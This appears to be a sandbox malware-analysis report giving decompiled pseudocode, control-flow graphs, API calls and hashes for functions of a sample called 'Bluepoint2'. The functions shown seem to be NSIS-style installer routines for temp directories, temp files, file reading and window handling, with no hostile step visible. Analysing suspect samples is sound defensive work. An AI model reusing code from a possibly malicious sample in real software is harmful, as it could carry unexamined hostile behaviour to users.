                                                                                                                                    0x00405bc8
                                                                                                                                    0x00405bce
                                                                                                                                    0x00405bd5
                                                                                                                                    0x00405bdc
                                                                                                                                    0x00405be4
                                                                                                                                    0x00405be6
                                                                                                                                    0x00000000
                                                                                                                                    0x00405be6
                                                                                                                                    0x00405bf0
                                                                                                                                    0x00405bf7
                                                                                                                                    0x00405c0d
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00405c0f
                                                                                                                                    0x00405c13

                                                                                                                                    APIs
                                                                                                                                    • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                                                                                                                    • GetLastError.KERNEL32 ref: 00405BF0
                                                                                                                                    • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C05
                                                                                                                                    • GetLastError.KERNEL32 ref: 00405C0F
                                                                                                                                    Strings
                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BBF
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                    • API String ID: 3449924974-3355392842
                                                                                                                                    • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                                                                                                    • Instruction ID: 886f74eda6482ab63e8fe18d08a652fea41827dc0a526659a7d7b5e138c44e4e
                                                                                                                                    • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                                                                                                    • Instruction Fuzzy Hash: 95010871D04219EAEF009FA1CD44BEFBBB8EF14314F04403ADA44B6180E7789648CB99
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 713C1817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 960 713c1817-713c1856 call 713c1bff 964 713c185c-713c1860 960->964 965 713c1976-713c1978 960->965 966 713c1869-713c1876 call 713c2480 964->966 967 713c1862-713c1868 call 713c243e 964->967 972 713c1878-713c187d 966->972 973 713c18a6-713c18ad 966->973 967->966 976 713c187f-713c1880 972->976 977 713c1898-713c189b 972->977 974 713c18cd-713c18d1 973->974 975 713c18af-713c18cb call 713c2655 call 713c1654 call 713c1312 GlobalFree 973->975 981 713c191e-713c1924 call 713c2655 974->981 982 713c18d3-713c191c call 713c1666 call 713c2655 974->982 998 713c1925-713c1929 975->998 979 713c1888-713c1889 call 713c2b98 976->979 980 713c1882-713c1883 976->980 977->973 983 713c189d-713c189e call 713c2e23 977->983 993 713c188e 979->993 986 713c1885-713c1886 980->986 987 713c1890-713c1896 call 713c2810 980->987 981->998 982->998 996 713c18a3 983->996 986->973 986->979 997 713c18a5 987->997 993->996 996->997 997->973 1002 713c192b-713c1939 call 713c2618 998->1002 1003 713c1966-713c196d 998->1003 1010 713c193b-713c193e 1002->1010 1011 713c1951-713c1958 1002->1011 1003->965 1008 713c196f-713c1970 GlobalFree 1003->1008 1008->965 1010->1011 1012 713c1940-713c1948 1010->1012 1011->1003 1013 713c195a-713c1965 call 713c15dd 1011->1013 1012->1011 1014 713c194a-713c194b FreeLibrary 1012->1014 1013->1003 1014->1011
                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                    			E713C1817(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				char _v136;
				struct HINSTANCE__* _t37;
				intOrPtr _t42;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t54;
				intOrPtr _t57;
				signed int _t61;
				signed int _t63;
				void* _t67;
				void* _t68;
				void* _t72;
				void* _t76;

				_t76 = __esi;
				_t68 = __edi;
				_t67 = __edx;
				 *0x713c506c = _a8;
				 *0x713c5070 = _a16;
				 *0x713c5074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x713c5048, E713C1651);
				_push(1); // executed
				_t37 = E713C1BFF(); // executed
				_t54 = _t37;
				if(_t54 == 0) {
					L28:
					return _t37;
				} else {
					if( *((intOrPtr*)(_t54 + 4)) != 1) {
						E713C243E(_t54);
					}
					_push(_t54);
					E713C2480(_t67);
					_t57 =  *((intOrPtr*)(_t54 + 4));
					if(_t57 == 0xffffffff) {
						L14:
						if(( *(_t54 + 0x1010) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t54 + 4)) == 0) {
								_push(_t54);
								_t37 = E713C2655();
							} else {
								_push(_t76);
								_push(_t68);
								_t61 = 8;
								_t13 = _t54 + 0x1018; // 0x1018
								memcpy( &_v36, _t13, _t61 << 2);
								_t42 = E713C1666(_t54,  &_v136);
								 *(_t54 + 0x1034) =  *(_t54 + 0x1034) & 0x00000000;
								_t18 = _t54 + 0x1018; // 0x1018
								_t72 = _t18;
								_push(_t54);
								 *((intOrPtr*)(_t54 + 0x1020)) = _t42;
								 *_t72 = 4;
								E713C2655();
								_t63 = 8;
								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
							}
						} else {
							_push(_t54);
							E713C2655();
							_t37 = GlobalFree(E713C1312(E713C1654(_t54)));
						}
						if( *((intOrPtr*)(_t54 + 4)) != 1) {
							_t37 = E713C2618(_t54);
							if(( *(_t54 + 0x1010) & 0x00000040) != 0 &&  *_t54 == 1) {
								_t37 =  *(_t54 + 0x1008);
								if(_t37 != 0) {
									_t37 = FreeLibrary(_t37);
								}
							}
							if(( *(_t54 + 0x1010) & 0x00000020) != 0) {
								_t37 = E713C15DD( *0x713c5068);
							}
						}
						if(( *(_t54 + 0x1010) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t54);
						}
					}
					_t48 =  *_t54;
					if(_t48 == 0) {
						if(_t57 != 1) {
							goto L14;
						}
						E713C2E23(_t54);
						L12:
						_t54 = _t48;
						L13:
						goto L14;
					}
					_t49 = _t48 - 1;
					if(_t49 == 0) {
						L8:
						_t48 = E713C2B98(_t57, _t54); // executed
						goto L12;
					}
					_t50 = _t49 - 1;
					if(_t50 == 0) {
						E713C2810(_t54);
						goto L13;
					}
					if(_t50 != 1) {
						goto L14;
					}
					goto L8;
				}
			}


















                                                                                                                                    0x713c1817
                                                                                                                                    0x713c1817
                                                                                                                                    0x713c1817
                                                                                                                                    0x713c1824
                                                                                                                                    0x713c182c
                                                                                                                                    0x713c1839
                                                                                                                                    0x713c1847
                                                                                                                                    0x713c184a
                                                                                                                                    0x713c184c
                                                                                                                                    0x713c1851
                                                                                                                                    0x713c1856
                                                                                                                                    0x713c1978
                                                                                                                                    0x713c1978
                                                                                                                                    0x713c185c
                                                                                                                                    0x713c1860
                                                                                                                                    0x713c1863
                                                                                                                                    0x713c1868
                                                                                                                                    0x713c1869
                                                                                                                                    0x713c186a
                                                                                                                                    0x713c1870
                                                                                                                                    0x713c1876
                                                                                                                                    0x713c18a6
                                                                                                                                    0x713c18ad
                                                                                                                                    0x713c18d1
                                                                                                                                    0x713c191e
                                                                                                                                    0x713c191f
                                                                                                                                    0x713c18d3
                                                                                                                                    0x713c18d3
                                                                                                                                    0x713c18d4
                                                                                                                                    0x713c18dd
                                                                                                                                    0x713c18de
                                                                                                                                    0x713c18e8
                                                                                                                                    0x713c18eb
                                                                                                                                    0x713c18f0
                                                                                                                                    0x713c18f7
                                                                                                                                    0x713c18f7
                                                                                                                                    0x713c18fd
                                                                                                                                    0x713c18fe
                                                                                                                                    0x713c1904
                                                                                                                                    0x713c190a
                                                                                                                                    0x713c1917
                                                                                                                                    0x713c1918
                                                                                                                                    0x713c191b
                                                                                                                                    0x713c18af
                                                                                                                                    0x713c18af
                                                                                                                                    0x713c18b0
                                                                                                                                    0x713c18c5
                                                                                                                                    0x713c18c5
                                                                                                                                    0x713c1929
                                                                                                                                    0x713c192c
                                                                                                                                    0x713c1939
                                                                                                                                    0x713c1940
                                                                                                                                    0x713c1948
                                                                                                                                    0x713c194b
                                                                                                                                    0x713c194b
                                                                                                                                    0x713c1948
                                                                                                                                    0x713c1958
                                                                                                                                    0x713c1960
                                                                                                                                    0x713c1965
                                                                                                                                    0x713c1958
                                                                                                                                    0x713c196d
                                                                                                                                    0x00000000
                                                                                                                                    0x713c196f
                                                                                                                                    0x00000000
                                                                                                                                    0x713c1970
                                                                                                                                    0x713c196d
                                                                                                                                    0x713c187a
                                                                                                                                    0x713c187d
                                                                                                                                    0x713c189b
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x713c189e
                                                                                                                                    0x713c18a3
                                                                                                                                    0x713c18a3
                                                                                                                                    0x713c18a5
                                                                                                                                    0x00000000
                                                                                                                                    0x713c18a5
                                                                                                                                    0x713c187f
                                                                                                                                    0x713c1880
                                                                                                                                    0x713c1888
                                                                                                                                    0x713c1889
                                                                                                                                    0x00000000
                                                                                                                                    0x713c1889
                                                                                                                                    0x713c1882
                                                                                                                                    0x713c1883
                                                                                                                                    0x713c1891
                                                                                                                                    0x00000000
                                                                                                                                    0x713c1891
                                                                                                                                    0x713c1886
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x713c1886

                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 713C1BFF: GlobalFree.KERNEL32(?), ref: 713C1E74
                                                                                                                                      • Part of subcall function 713C1BFF: GlobalFree.KERNEL32(?), ref: 713C1E79
                                                                                                                                      • Part of subcall function 713C1BFF: GlobalFree.KERNEL32(?), ref: 713C1E7E
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 713C18C5
                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 713C194B
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 713C1970
                                                                                                                                      • Part of subcall function 713C243E: GlobalAlloc.KERNEL32(00000040,?), ref: 713C246F
                                                                                                                                      • Part of subcall function 713C2810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,713C1896,00000000), ref: 713C28E0
                                                                                                                                      • Part of subcall function 713C1666: wsprintfW.USER32 ref: 713C1694
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84129670690.00000000713C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 713C0000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84129620684.00000000713C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84129732994.00000000713C4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84129781776.00000000713C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_713c0000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3962662361-3916222277
                                                                                                                                    • Opcode ID: 971f886d648c27e1f583570057670b184439cd69f0b56634fdf565a5ac49ed0a
                                                                                                                                    • Instruction ID: 7b202262028477fc522adec54db0ba6ef0dd75bd4032aab17588c9f72c6dab22
                                                                                                                                    • Opcode Fuzzy Hash: 971f886d648c27e1f583570057670b184439cd69f0b56634fdf565a5ac49ed0a
                                                                                                                                    • Instruction Fuzzy Hash: 5641B472504306DBEB019F64D884FD63BBCBF05B5CF144465ED469A0CADBB4D886E7A0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00406187 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1017 406187-406193 1018 406194-4061c8 GetTickCount GetTempFileNameW 1017->1018 1019 4061d7-4061d9 1018->1019 1020 4061ca-4061cc 1018->1020 1022 4061d1-4061d4 1019->1022 1020->1018 1021 4061ce 1020->1021 1021->1022
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00406187(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a5ac; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}












                                                                                                                                    0x0040618d
                                                                                                                                    0x00406193
                                                                                                                                    0x00406194
                                                                                                                                    0x00406194
                                                                                                                                    0x00406199
                                                                                                                                    0x0040619a
                                                                                                                                    0x0040619d
                                                                                                                                    0x004061a2
                                                                                                                                    0x004061a5
                                                                                                                                    0x004061af
                                                                                                                                    0x004061bc
                                                                                                                                    0x004061c0
                                                                                                                                    0x004061c8
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004061cc
                                                                                                                                    0x00000000
                                                                                                                                    0x004061ce
                                                                                                                                    0x004061ce
                                                                                                                                    0x004061ce
                                                                                                                                    0x004061d1
                                                                                                                                    0x004061d4
                                                                                                                                    0x004061d4
                                                                                                                                    0x004061d7
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                    • GetTickCount.KERNEL32 ref: 004061A5
                                                                                                                                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040363E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 004061C0
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CountFileNameTempTick
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                    • API String ID: 1716503409-944333549
                                                                                                                                    • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                                                                                                    • Instruction ID: 21b676f9b33da427d45e0b2d6905a63b6509bf3d89a4e990effff8b21c6fdcbe
                                                                                                                                    • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                                                                                                    • Instruction Fuzzy Hash: C3F09076700214BFEB008F59DD05E9AB7BCEBA1710F11803AEE05EB180E6B0A9648768
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00403371 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1106 403371-40337e 1107 403380-403396 SetFilePointer 1106->1107 1108 40339c-4033a5 call 403479 1106->1108 1107->1108 1111 403473-403476 1108->1111 1112 4033ab-4033be call 4061db 1108->1112 1115 403463 1112->1115 1116 4033c4-4033d7 call 403479 1112->1116 1117 403465-403466 1115->1117 1120 403471 1116->1120 1121 4033dd-4033e0 1116->1121 1117->1111 1120->1111 1122 4033e2-4033e5 1121->1122 1123 40343f-403445 1121->1123 1122->1120 1124 4033eb 1122->1124 1125 403447 1123->1125 1126 40344a-403461 ReadFile 1123->1126 1128 4033f0-4033fa 1124->1128 1125->1126 1126->1115 1127 403468-40346b 1126->1127 1127->1120 1129 403401-403413 call 4061db 1128->1129 1130 4033fc 1128->1130 1129->1115 1133 403415-40341c call 40620a 1129->1133 1130->1129 1135 403421-403423 1133->1135 1136 403425-403437 1135->1136 1137 40343b-40343d 1135->1137 1136->1128 1138 403439 1136->1138 1137->1117 1138->1120
                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                    			E00403371(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x42a2b8;
					 *0x420ef4 = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E00403479(4);
				if(_t22 >= 0) {
					_t24 = E004061DB( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x420ef4 =  *0x420ef4 + 4;
						_t36 = E00403479(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x420ef4 =  *0x420ef4 + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										if(E004061DB( *0x40a01c, 0x414ef0, _t28) == 0) {
											goto L18;
										}
										_t30 = E0040620A(_a8, 0x414ef0, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x420ef4 =  *0x420ef4 + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}














                                                                                                                                    0x00403375
                                                                                                                                    0x0040337e
                                                                                                                                    0x00403387
                                                                                                                                    0x0040338b
                                                                                                                                    0x00403396
                                                                                                                                    0x00403396
                                                                                                                                    0x0040339e
                                                                                                                                    0x004033a5
                                                                                                                                    0x004033b7
                                                                                                                                    0x004033be
                                                                                                                                    0x00403463
                                                                                                                                    0x00403463
                                                                                                                                    0x00000000
                                                                                                                                    0x004033c4
                                                                                                                                    0x004033c7
                                                                                                                                    0x004033d3
                                                                                                                                    0x004033d7
                                                                                                                                    0x00403471
                                                                                                                                    0x00403471
                                                                                                                                    0x004033dd
                                                                                                                                    0x004033e0
                                                                                                                                    0x0040343f
                                                                                                                                    0x00403445
                                                                                                                                    0x00403447
                                                                                                                                    0x00403447
                                                                                                                                    0x00403459
                                                                                                                                    0x00403461
                                                                                                                                    0x00403468
                                                                                                                                    0x0040346b
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004033e2
                                                                                                                                    0x004033e5
                                                                                                                                    0x00000000
                                                                                                                                    0x004033eb
                                                                                                                                    0x004033f0
                                                                                                                                    0x004033f7
                                                                                                                                    0x004033fa
                                                                                                                                    0x004033fc
                                                                                                                                    0x004033fc
                                                                                                                                    0x00403409
                                                                                                                                    0x00403413
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040341c
                                                                                                                                    0x00403423
                                                                                                                                    0x0040343b
                                                                                                                                    0x00403465
                                                                                                                                    0x00403465
                                                                                                                                    0x00403425
                                                                                                                                    0x00403425
                                                                                                                                    0x00403428
                                                                                                                                    0x0040342b
                                                                                                                                    0x00403431
                                                                                                                                    0x00403437
                                                                                                                                    0x00000000
                                                                                                                                    0x00403439
                                                                                                                                    0x00000000
                                                                                                                                    0x00403439
                                                                                                                                    0x00403437
                                                                                                                                    0x00000000
                                                                                                                                    0x00403423
                                                                                                                                    0x00000000
                                                                                                                                    0x004033f0
                                                                                                                                    0x004033e5
                                                                                                                                    0x004033e0
                                                                                                                                    0x004033d7
                                                                                                                                    0x004033be
                                                                                                                                    0x00403473
                                                                                                                                    0x00403476

                                                                                                                                    APIs
                                                                                                                                    • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 00403396
                                                                                                                                    Strings
                                                                                                                                    • <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"> <g fill="#2e3436"> <path d="m 164,249 v 1.5 4.5 h 3 v -4.5 -1.5 z m -4,3 v 1.5 1.5 h 3 v -1.5 -1.5 z m -8,8 v 1.5 1.5 h 3 v -1.5 -1.5 z m 4,0 v 1.5 1.5 h 3 v -1.5 -1.5 z m 4,0 v 1.5 1., xrefs: 004033EB, 00403402, 00403418
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FilePointer
                                                                                                                                    • String ID: <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"> <g fill="#2e3436"> <path d="m 164,249 v 1.5 4.5 h 3 v -4.5 -1.5 z m -4,3 v 1.5 1.5 h 3 v -1.5 -1.5 z m -8,8 v 1.5 1.5 h 3 v -1.5 -1.5 z m 4,0 v 1.5 1.5 h 3 v -1.5 -1.5 z m 4,0 v 1.5 1.
                                                                                                                                    • API String ID: 973152223-4006934602
                                                                                                                                    • Opcode ID: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                                                                                                                    • Instruction ID: 963a71f16df831595788c30304fa9cedbf2cad19eb63879c1ada4fe15c9ed8fa
                                                                                                                                    • Opcode Fuzzy Hash: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                                                                                                                    • Instruction Fuzzy Hash: 93319F70200219EFDB129F65ED84E9A3FA8FF00355B10443AF905EA1A1D778CE51DBA9
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0040563E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                    			E0040563E(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t9;
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x423734 != _t16) {
							_push(_t16);
							_push(6);
							 *0x423734 = _t16;
							E00404FFF();
						}
						L11:
						_t9 = CallWindowProcW( *0x42373c, _a4, _t15, _a12, _t16); // executed
						return _t9;
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404F7F(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404610(0x413);
				return 0;
			}






                                                                                                                                    0x00405642
                                                                                                                                    0x0040564c
                                                                                                                                    0x00405668
                                                                                                                                    0x0040568a
                                                                                                                                    0x0040568d
                                                                                                                                    0x00405693
                                                                                                                                    0x0040569d
                                                                                                                                    0x0040569e
                                                                                                                                    0x004056a0
                                                                                                                                    0x004056a6
                                                                                                                                    0x004056a6
                                                                                                                                    0x004056b0
                                                                                                                                    0x004056be
                                                                                                                                    0x00000000
                                                                                                                                    0x004056be
                                                                                                                                    0x00405675
                                                                                                                                    0x004056ad
                                                                                                                                    0x004056ad
                                                                                                                                    0x00000000
                                                                                                                                    0x004056ad
                                                                                                                                    0x00405681
                                                                                                                                    0x00405683
                                                                                                                                    0x00000000
                                                                                                                                    0x00405683
                                                                                                                                    0x00405652
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00405659
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                    • IsWindowVisible.USER32(?), ref: 0040566D
                                                                                                                                    • CallWindowProcW.USER32(?,?,?,?), ref: 004056BE
                                                                                                                                      • Part of subcall function 00404610: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3748168415-3916222277
